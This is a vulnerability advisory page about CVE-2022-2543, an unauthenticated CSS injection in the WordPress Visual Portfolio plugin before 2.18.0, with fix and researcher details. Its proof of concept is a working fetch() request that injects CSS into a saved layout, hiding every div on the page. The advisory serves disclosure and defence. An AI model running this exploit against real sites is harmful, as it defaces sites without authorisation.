Visual Portfolio < 2.18.0 – Unauthenticated CSS Injection | CVE 2022-2543 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation checks in some of its REST endpoints, allowing unauthenticated users to call them and inject arbitrary CSS in arbitrary saved layouts

Proof of Concept

The post_id is the ID of a saved layout

fetch('/?rest_route=/visual-portfolio/v1/update_layout&post_id=8&data[vp_custom_css]=body{background-image:url(data://image/gif;base64,R0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs=);}div{display:none !important};', {
  method: 'POST',
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

visual-portfolio

Fixed in 2.18.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc

Submitter twitter

Verified

Yes

WPVDB ID

5dc8b671-f2fa-47be-8664-9005c4fdbea8

Timeline

Publicly Published

2022-08-15 (about 1 years ago)

Added

2022-08-15 (about 1 years ago)

Last Updated

2023-05-07 (about 1 years ago)

Other

Published

Title

Published

2021-11-03

Title

Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure

Published

2024-04-29

Title

Academy LMS < 1.9.17 - Missing Authorization

Published

2024-04-25

Title

Client Dash <= 2.2.1 - Missing Authorization

Published

2024-04-29

Title

RomethemeKit For Elementor < 1.4.2 - Missing Authorization

Published

2023-10-03

Title

Optimize Database after Deleting Revisions < 5.1 - Missing Authorization via 'odb_csv_download'